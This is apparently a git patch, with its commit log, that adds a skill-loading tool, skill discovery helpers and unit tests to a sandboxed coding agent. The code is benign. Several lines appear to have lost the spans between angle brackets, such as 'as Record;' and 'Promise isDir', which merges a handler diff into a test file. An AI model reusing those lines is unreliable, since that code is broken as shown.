extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. 
Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at ${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - ${workingDirectory}/.claude/skills/ (project, claude-style) - ${workingDirectory}/.agents/skills/ (project, agents-style) - ${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. 
Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against `recoupable/org-rostrum-pacific-...` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked `skill({ skill: "recoup-api" })` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds. 
Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 2 +- lib/agent/__tests__/buildAgentTools.test.ts | 47 ++++- lib/agent/buildAgentTools.ts | 24 +-- lib/agent/tools/AgentContext.ts | 11 ++ lib/agent/tools/__tests__/skillTool.test.ts | 169 ++++++++++++++++++ lib/agent/tools/skillTool.ts | 87 +++++++++ .../handleChatWorkflowStream.test.ts | 13 ++ lib/chat/handleChatWorkflowStream.ts | 21 +++ lib/skills/__tests__/discoverSkills.test.ts | 158 ++++++++++++++++ lib/skills/__tests__/extractSkillBody.test.ts | 22 +++ lib/skills/__tests__/findSkillFile.test.ts | 34 ++++ .../getGlobalSkillsDirectory.test.ts | 15 ++ .../getSandboxSkillDirectories.test.ts | 23 +++ lib/skills/__tests__/getSkills.test.ts | 31 ++++ .../__tests__/injectSkillDirectory.test.ts | 14 ++ .../__tests__/parseSkillFrontmatter.test.ts | 56 ++++++ .../__tests__/substituteArguments.test.ts | 22 +++ lib/skills/discoverSkills.ts | 89 +++++++++ lib/skills/extractSkillBody.ts | 14 ++ lib/skills/findSkillFile.ts | 33 ++++ lib/skills/getGlobalSkillsDirectory.ts | 14 ++ 
lib/skills/getSandboxSkillDirectories.ts | 16 ++ lib/skills/getSkills.ts | 22 +++ lib/skills/injectSkillDirectory.ts | 11 ++ lib/skills/parseSkillFrontmatter.ts | 52 ++++++ lib/skills/skillTypes.ts | 76 ++++++++ lib/skills/substituteArguments.ts | 14 ++ 27 files changed, 1071 insertions(+), 19 deletions(-) create mode 100644 lib/agent/tools/__tests__/skillTool.test.ts create mode 100644 lib/agent/tools/skillTool.ts create mode 100644 lib/skills/__tests__/discoverSkills.test.ts create mode 100644 lib/skills/__tests__/extractSkillBody.test.ts create mode 100644 lib/skills/__tests__/findSkillFile.test.ts create mode 100644 lib/skills/__tests__/getGlobalSkillsDirectory.test.ts create mode 100644 lib/skills/__tests__/getSandboxSkillDirectories.test.ts create mode 100644 lib/skills/__tests__/getSkills.test.ts create mode 100644 lib/skills/__tests__/injectSkillDirectory.test.ts create mode 100644 lib/skills/__tests__/parseSkillFrontmatter.test.ts create mode 100644 lib/skills/__tests__/substituteArguments.test.ts create mode 100644 lib/skills/discoverSkills.ts create mode 100644 lib/skills/extractSkillBody.ts create mode 100644 lib/skills/findSkillFile.ts create mode 100644 lib/skills/getGlobalSkillsDirectory.ts create mode 100644 lib/skills/getSandboxSkillDirectories.ts create mode 100644 lib/skills/getSkills.ts create mode 100644 lib/skills/injectSkillDirectory.ts create mode 100644 lib/skills/parseSkillFrontmatter.ts create mode 100644 lib/skills/skillTypes.ts create mode 100644 lib/skills/substituteArguments.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index f9a894195..704035c64 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -42,7 +42,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe }); const modelMessages = convertToModelMessages(input.messages); - const tools = buildAgentTools(); + const tools = buildAgentTools({ skills: input.agentContext.skills 
}); const result = streamText({ model: gateway(input.modelId), system: agentCustomInstructions, diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts index 5478c59ca..fb5d99a5a 100644 --- a/lib/agent/__tests__/buildAgentTools.test.ts +++ b/lib/agent/__tests__/buildAgentTools.test.ts @@ -1,7 +1,7 @@ import { describe, it, expect } from "vitest"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; -const EXPECTED_TOOL_NAMES = [ +const BASE_TOOLS = [ "bash", "read", "write", @@ -13,19 +13,50 @@ const EXPECTED_TOOL_NAMES = [ ] as const; describe("buildAgentTools", () => { - it("returns a tools record with all 8 leaf tools registered", () => { + it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => { const tools = buildAgentTools(); - for (const name of EXPECTED_TOOL_NAMES) { + for (const name of BASE_TOOLS) { expect(tools).toHaveProperty(name); } + expect(tools).not.toHaveProperty("skill"); + }); + + it("registers the skill tool when a non-empty skill catalog is provided", () => { + const tools = buildAgentTools({ + skills: [ + { + name: "commit", + description: "Make a commit", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }); + expect(tools).toHaveProperty("skill"); + for (const name of BASE_TOOLS) { + expect(tools).toHaveProperty(name); + } + }); + + it("omits the skill tool when an empty array is passed", () => { + const tools = buildAgentTools({ skills: [] }); + expect(tools).not.toHaveProperty("skill"); }); it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => { - const tools = buildAgentTools() as Record< - string, - { description?: unknown; inputSchema?: unknown; execute?: unknown } - >; - for (const name of EXPECTED_TOOL_NAMES) { + const tools = buildAgentTools({ + skills: [ + { + name: "foo", + description: "x", + path: "/p", + filename: "SKILL.md", + options: {}, + }, + ], + }) as 
Record; + for (const name of [...BASE_TOOLS, "skill"]) { const t = tools[name]!; expect(typeof t.description).toBe("string"); expect(t.inputSchema).toBeDefined(); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts index f9cbc2b39..393b32889 100644 --- a/lib/agent/buildAgentTools.ts +++ b/lib/agent/buildAgentTools.ts @@ -6,24 +6,27 @@ import { grepTool } from "@/lib/agent/tools/grepTool"; import { globTool } from "@/lib/agent/tools/globTool"; import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; +import { skillTool } from "@/lib/agent/tools/skillTool"; +import type { SkillMetadata } from "@/lib/skills/skillTypes"; /** * Factory for the full agent tool set passed into `streamText({ tools })`. - * Each tool reads its sandbox handle + recoup creds from `experimental_context` - * at execute time — the factory takes no arguments because the tools are - * stateless modulo that context. + * Each tool reads its sandbox handle + per-prompt context from + * `experimental_context` at execute time — the factory is otherwise stateless. * - * Currently ships 8 leaf tools: - * - bash, read, write, edit, grep, glob (sandbox / file ops) + * Currently ships 9 tools: + * - 6 file/shell: bash, read, write, edit, grep, glob * - todo_write (planning surface; stateless, echoes the list back) * - web_fetch (HTTP via curl inside the sandbox) + * - skill (load a project-level skill's SKILL.md; only registered when the + * sandbox has skills available, so models without any skill catalog + * don't see the tool at all and never call it speculatively) * - * Composite tools (`task` subagent, `ask_user_question` UI part, - * `skill` skill discovery) port in a follow-up PR — they require - * subagent context plumbing / UI rendering / skill discovery infra - * that isn't in api today. + * @param options.skills - Discovered skill catalog. 
When empty / undefined, + * `skill` is omitted from the tool record so the model doesn't see it. */ -export function buildAgentTools() { +export function buildAgentTools(options: { skills?: SkillMetadata[] } = {}) { + const hasSkills = (options.skills?.length ?? 0) > 0; return { bash: bashTool, read: readFileTool, @@ -33,6 +36,7 @@ export function buildAgentTools() { glob: globTool, todo_write: todoWriteTool, web_fetch: webFetchTool, + ...(hasSkills ? { skill: skillTool } : {}), }; } diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts index 63d2a1b7e..acb455164 100644 --- a/lib/agent/tools/AgentContext.ts +++ b/lib/agent/tools/AgentContext.ts @@ -1,4 +1,5 @@ import type { VercelState } from "@/lib/sandbox/vercel/state"; +import type { SkillMetadata } from "@/lib/skills/skillTypes"; /** * Per-tool-call context threaded into the agent via `streamText`'s @@ -31,4 +32,14 @@ export type AgentContext = { * Public information — no security risk in exposing. */ recoupOrgId?: string; + /** + * Skills discovered in the sandbox before workflow start (handler + * calls `discoverSkills(sandbox, await getSandboxSkillDirectories(sandbox))`). + * The `skillTool` reads this list to: + * - resolve names → SKILL.md paths + * - filter out skills with `disable-model-invocation` + * - surface "Available skills" hints when a model picks an unknown name + * Empty / undefined when no skills were discovered (including when discovery fails). 
+ */ + skills?: SkillMetadata[]; }; diff --git a/lib/agent/tools/__tests__/skillTool.test.ts b/lib/agent/tools/__tests__/skillTool.test.ts new file mode 100644 index 000000000..0b3196dbc --- /dev/null +++ b/lib/agent/tools/__tests__/skillTool.test.ts @@ -0,0 +1,169 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { skillTool } from "@/lib/agent/tools/skillTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const baseCtx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(readFile: ReturnType) { + return { workingDirectory: "/sandbox/mono", readFile }; +} + +function skillMd(body: string) { + return `---\nname: commit\ndescription: Make a commit\n---\n\n${body}`; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("skillTool", () => { + it("returns success:false with available skills when the requested skill isn't in context", async () => { + vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never); + const result = (await skillTool.execute!({ skill: "unknown" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "Make a commit", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + { + name: "deploy", + description: "Deploy", + path: "/sandbox/mono/skills/deploy", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/Available skills: commit, deploy/); + }); + + it("returns success:false when no skills are loaded", async () => { + vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never); + const result = (await skillTool.execute!({ skill: "commit" }, { + experimental_context: { ...baseCtx, skills: [] }, + } as never)) as 
{ success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/Available skills: none/); + }); + + it("matches the skill name case-insensitively (slash-command behavior)", async () => { + const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("body content"))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!( + { skill: "COMMIT" }, // model typed it loud + { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "x", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never, + )) as { success: boolean; skillName: string }; + expect(result.success).toBe(true); + expect(result.skillName).toBe("COMMIT"); + }); + + it("returns the SKILL.md body with skill directory injected", async () => { + const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("Run git commit -m ..."))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!({ skill: "commit" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "x", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never)) as { success: boolean; content: string; skillPath: string }; + expect(result.success).toBe(true); + expect(result.skillPath).toBe("/sandbox/mono/skills/commit"); + expect(result.content).toContain("Skill directory: /sandbox/mono/skills/commit"); + expect(result.content).toContain("Run git commit -m ..."); + expect(sb.readFile).toHaveBeenCalledWith("/sandbox/mono/skills/commit/SKILL.md", "utf-8"); + }); + + it("substitutes $ARGUMENTS in the skill body when args are provided", async () => { + const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd('git commit -m "$ARGUMENTS"'))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!({ skill: "commit", 
args: "fix bug" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "x", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never)) as { content: string }; + expect(result.content).toContain('git commit -m "fix bug"'); + expect(result.content).not.toContain("$ARGUMENTS"); + }); + + it("rejects skills with disable-model-invocation set", async () => { + vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never); + const result = (await skillTool.execute!({ skill: "internal" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "internal", + description: "x", + path: "/sandbox/mono/skills/internal", + filename: "SKILL.md", + options: { disableModelInvocation: true }, + }, + ], + }, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/cannot be invoked/); + }); + + it("returns success:false when the SKILL.md read fails", async () => { + const sb = makeSandbox(vi.fn().mockRejectedValue(new Error("ENOENT"))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!({ skill: "commit" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "x", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/ENOENT/); + }); +}); diff --git a/lib/agent/tools/skillTool.ts b/lib/agent/tools/skillTool.ts new file mode 100644 index 000000000..8c74f35d1 --- /dev/null +++ b/lib/agent/tools/skillTool.ts @@ -0,0 +1,87 @@ +import * as path from "path"; +import { tool } from "ai"; +import { z } from "zod"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { extractSkillBody } from "@/lib/skills/extractSkillBody"; +import { getSkills } from 
"@/lib/skills/getSkills"; +import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory"; +import { substituteArguments } from "@/lib/skills/substituteArguments"; + +const skillInputSchema = z.object({ + skill: z.string().describe("The skill name to invoke"), + args: z.string().optional().describe("Optional arguments for the skill"), +}); + +/** + * `skill` — load a project-level skill's SKILL.md body and return it + * to the model. The model then follows the loaded instructions in + * subsequent turns (using `bash`, `read`, `write`, etc. to actually + * carry them out). The skill catalog itself is discovered in the + * handler before workflow start and threaded via `AgentContext.skills`. + * + * Matching is case-insensitive so the model can resolve a slash command + * like `/Commit` against a skill named `commit`. Skills marked with + * `disable-model-invocation` in their frontmatter are filtered out at + * the gate — only the user (via a server-side dispatcher) can run them. + */ +export const skillTool = tool({ + description: `Execute a skill within the main conversation. + +When users ask you to perform tasks, check if any of the available skills can help complete the task more effectively. Skills provide specialized capabilities and domain knowledge. + +When users ask you to run a "slash command" or reference "/" (e.g., "/commit", "/review-pr"), they are referring to a skill. Use this tool to invoke the corresponding skill. 
+ +How to invoke: +- Use this tool with the skill name and optional arguments +- Examples: + - skill: "pdf" — invoke the pdf skill + - skill: "commit", args: "-m 'Fix bug'" — invoke with arguments + +Important: +- When a skill is relevant, invoke this tool IMMEDIATELY as your first action +- When the user's message starts with "/", they are invoking a skill — call this tool FIRST before any other tool +- NEVER just announce or mention a skill without actually calling this tool +- Only use skills listed in "Available skills" in your system prompt`, + inputSchema: skillInputSchema, + execute: async ({ skill, args }, { experimental_context }) => { + const sandbox = await getSandbox(experimental_context, "skill"); + const skills = getSkills(experimental_context); + + const normalized = skill.toLowerCase(); + const found = skills.find(s => s.name.toLowerCase() === normalized); + if (!found) { + const available = skills.map(s => s.name).join(", "); + return { + success: false, + error: `Skill '${skill}' not found. Available skills: ${available || "none"}`, + }; + } + + if (found.options.disableModelInvocation) { + return { + success: false, + error: `Skill '${skill}' cannot be invoked by the model (disable-model-invocation is set)`, + }; + } + + const skillFilePath = path.join(found.path, found.filename); + let fileContent: string; + try { + fileContent = await sandbox.readFile(skillFilePath, "utf-8"); + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + return { success: false, error: `Failed to read skill file: ${message}` }; + } + + const body = extractSkillBody(fileContent); + const bodyWithDir = injectSkillDirectory(body, found.path); + const content = substituteArguments(bodyWithDir, args); + + return { + success: true, + skillName: skill, + skillPath: found.path, + content, + }; + }, +}); diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts index fb3b434f1..702edb918 100644 --- a/lib/chat/__tests__/handleChatWorkflowStream.test.ts +++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts @@ -39,6 +39,19 @@ vi.mock("@/lib/networking/getCorsHeaders", () => ({ })); vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") })); +// Stub sandbox connection + skill discovery so handler tests don't actually +// try to talk to Vercel Sandbox / parse SKILL.md files. The handler treats +// discovery failures as non-fatal (empty catalog), but we mock to keep tests fast. 
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(async () => ({ workingDirectory: "/sandbox/mono" })), +})); +vi.mock("@/lib/skills/discoverSkills", () => ({ + discoverSkills: vi.fn(async () => []), +})); +vi.mock("@/lib/skills/getSandboxSkillDirectories", () => ({ + getSandboxSkillDirectories: vi.fn(() => ["/sandbox/mono/skills"]), +})); + const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; const SESSION_ID = "22222222-2222-2222-2222-222222222222"; diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts index 6ceb0c867..818c70f8c 100644 --- a/lib/chat/handleChatWorkflowStream.ts +++ b/lib/chat/handleChatWorkflowStream.ts @@ -15,7 +15,10 @@ import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow"; import { extractOrgId } from "@/lib/recoupable/extractOrgId"; import { DEFAULT_WORKING_DIRECTORY } from "@/lib/sandbox/vercel/sandbox/constants"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; import type { VercelState } from "@/lib/sandbox/vercel/state"; +import { discoverSkills } from "@/lib/skills/discoverSkills"; +import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories"; import generateUUID from "@/lib/uuid/generateUUID"; const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5"; @@ -90,6 +93,23 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise> = []; + try { + const sandbox = await connectVercel(session.sandbox_state as VercelState); + const dirs = await getSandboxSkillDirectories(sandbox); + skills = await discoverSkills(sandbox, dirs); + } catch (error) { + console.error( + "[handleChatWorkflowStream] skill discovery failed; continuing with empty catalog:", + error, + ); + } + const run = await start(runAgentWorkflow, [ { messages: validated.messages, @@ -105,6 
+125,7 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise isDir, isFile: () => !isDir, size: 0, mtimeMs: 0 }; +} + +function makeDirent(name: string, isDir: boolean) { + return { + name, + isDirectory: () => isDir, + isFile: () => !isDir, + isSymbolicLink: () => false, + isBlockDevice: () => false, + isCharacterDevice: () => false, + isFIFO: () => false, + isSocket: () => false, + }; +} + +function frontmatter(name: string, description: string, extra = "") { + return `---\nname: ${name}\ndescription: ${description}\n${extra}---\n\nBody for ${name}`; +} + +function makeSandbox() { + const files = new Map(); + return { + files, + workingDirectory: "/sandbox/mono", + stat: vi.fn(async (path: string) => { + if (path.endsWith("/skills")) return makeStat(true); + if (path.startsWith("/sandbox/mono/skills/") && !path.endsWith(".md")) return makeStat(true); + throw new Error(`ENOENT: ${path}`); + }), + readdir: vi.fn(), + access: vi.fn(async (path: string) => { + if (!files.has(path)) throw new Error(`ENOENT: ${path}`); + }), + readFile: vi.fn(async (path: string) => { + const content = files.get(path); + if (content === undefined) throw new Error(`ENOENT: ${path}`); + return content; + }), + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("discoverSkills", () => { + it("discovers a single skill with name + description + path", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("commit", true)]); + sb.files.set("/sandbox/mono/skills/commit/SKILL.md", frontmatter("commit", "Make a commit")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]).toMatchObject({ + name: "commit", + description: "Make a commit", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + }); + }); + + it("falls back to lowercase skill.md when SKILL.md is missing", async () => { + const sb = makeSandbox(); + 
sb.readdir.mockResolvedValue([makeDirent("lowercase", true)]); + sb.files.set("/sandbox/mono/skills/lowercase/skill.md", frontmatter("lowercase", "lc")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.filename).toBe("skill.md"); + }); + + it("returns [] when the directory does not exist", async () => { + const sb = makeSandbox(); + sb.stat.mockRejectedValue(new Error("ENOENT")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toEqual([]); + }); + + it("skips entries that aren't directories", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("README.md", false), makeDirent("good", true)]); + sb.files.set("/sandbox/mono/skills/good/SKILL.md", frontmatter("good", "yes")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.name).toBe("good"); + }); + + it("skips subdirs without SKILL.md / skill.md", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("empty", true), makeDirent("real", true)]); + sb.files.set("/sandbox/mono/skills/real/SKILL.md", frontmatter("real", "yes")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.name).toBe("real"); + }); + + it("skips skills with invalid frontmatter (missing required fields)", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("broken", true), makeDirent("ok", true)]); + sb.files.set("/sandbox/mono/skills/broken/SKILL.md", "---\nname: broken\n---\nno desc"); + sb.files.set("/sandbox/mono/skills/ok/SKILL.md", frontmatter("ok", "yes")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.name).toBe("ok"); + }); + + it("skips skills whose names shadow built-in 
commands (model / resume / new)", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([ + makeDirent("model", true), + makeDirent("resume", true), + makeDirent("new", true), + makeDirent("kept", true), + ]); + for (const name of ["model", "resume", "new", "kept"]) { + sb.files.set(`/sandbox/mono/skills/${name}/SKILL.md`, frontmatter(name, "x")); + } + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills.map(s => s.name)).toEqual(["kept"]); + }); + + it("dedupes by name across multiple directories (first wins, case-insensitive)", async () => { + const sb = makeSandbox(); + sb.readdir.mockImplementation(async (dir: string) => { + if (dir === "/sandbox/mono/skills") return [makeDirent("Foo", true)] as never; + if (dir === "/global/.skills") return [makeDirent("foo", true)] as never; + return []; + }); + sb.files.set("/sandbox/mono/skills/Foo/SKILL.md", frontmatter("Foo", "project")); + sb.files.set("/global/.skills/foo/SKILL.md", frontmatter("foo", "global")); + sb.stat.mockImplementation(async (p: string) => { + if (p === "/sandbox/mono/skills" || p === "/global/.skills") return makeStat(true); + throw new Error("ENOENT"); + }); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills", "/global/.skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.description).toBe("project"); // first dir wins + }); + + it("populates options from frontmatter (camelCase + split lists)", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("scoped", true)]); + sb.files.set( + "/sandbox/mono/skills/scoped/SKILL.md", + frontmatter( + "scoped", + "limited", + "allowed-tools: bash, read\ndisable-model-invocation: true\n", + ), + ); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills[0]?.options).toEqual({ + disableModelInvocation: true, + allowedTools: ["bash", "read"], + }); + }); +}); diff --git 
a/lib/skills/__tests__/extractSkillBody.test.ts b/lib/skills/__tests__/extractSkillBody.test.ts new file mode 100644 index 000000000..b8f62bbc8 --- /dev/null +++ b/lib/skills/__tests__/extractSkillBody.test.ts @@ -0,0 +1,22 @@ +import { describe, it, expect } from "vitest"; +import { extractSkillBody } from "@/lib/skills/extractSkillBody"; + +describe("extractSkillBody", () => { + it("strips YAML frontmatter and returns the body", () => { + const md = "---\nname: foo\ndescription: bar\n---\n# Heading\n\nBody."; + expect(extractSkillBody(md)).toBe("# Heading\n\nBody."); + }); + + it("returns the full content when no frontmatter is present", () => { + expect(extractSkillBody("# Just a heading")).toBe("# Just a heading"); + }); + + it("trims surrounding whitespace", () => { + expect(extractSkillBody("---\nname: x\ndescription: y\n---\n\n\nbody\n\n")).toBe("body"); + }); + + it("tolerates Windows-style CRLF line endings", () => { + const md = "---\r\nname: foo\r\ndescription: bar\r\n---\r\nbody"; + expect(extractSkillBody(md)).toBe("body"); + }); +}); diff --git a/lib/skills/__tests__/findSkillFile.test.ts b/lib/skills/__tests__/findSkillFile.test.ts new file mode 100644 index 000000000..2d15de6fa --- /dev/null +++ b/lib/skills/__tests__/findSkillFile.test.ts @@ -0,0 +1,34 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { findSkillFile } from "@/lib/skills/findSkillFile"; + +beforeEach(() => vi.clearAllMocks()); + +function makeSandbox(existing: string[]) { + const set = new Set(existing); + return { + access: vi.fn(async (p: string) => { + if (!set.has(p)) throw new Error(`ENOENT: ${p}`); + }), + }; +} + +describe("findSkillFile", () => { + it("prefers uppercase SKILL.md when both casings exist", async () => { + const sb = makeSandbox(["/skills/foo/SKILL.md", "/skills/foo/skill.md"]); + const result = await findSkillFile(sb as never, "/skills/foo"); + expect(result).toBe("/skills/foo/SKILL.md"); + 
